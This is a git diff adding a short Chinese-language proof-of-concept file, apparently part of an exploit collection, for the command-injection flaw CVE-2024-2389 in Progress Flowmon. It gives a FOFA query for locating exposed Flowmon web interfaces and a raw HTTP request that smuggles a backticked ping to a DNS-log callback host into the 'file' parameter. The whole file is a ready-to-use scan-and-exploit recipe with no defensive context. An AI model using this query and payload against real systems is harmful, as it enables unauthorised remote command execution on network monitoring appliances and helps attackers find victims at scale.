diff --git "a/Progress-Flowmon\345\221\275\344\273\244\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-2389).md" "b/Progress-Flowmon\345\221\275\344\273\244\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-2389).md" new file mode 100644 index 0000000..dc6c561 --- /dev/null +++ "b/Progress-Flowmon\345\221\275\344\273\244\346\263\250\345\205\245\346\274\217\346\264\236(CVE-2024-2389).md" @@ -0,0 +1,19 @@ +## Progress-Flowmon命令注入漏洞(CVE-2024-2389) + + +## fofa +``` +body="Flowmon-Web-Interface" +``` + + +## poc +``` +GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15 +Connection: close +Accept: */* +Accept-Language: en +Accept-Encoding: gzip +```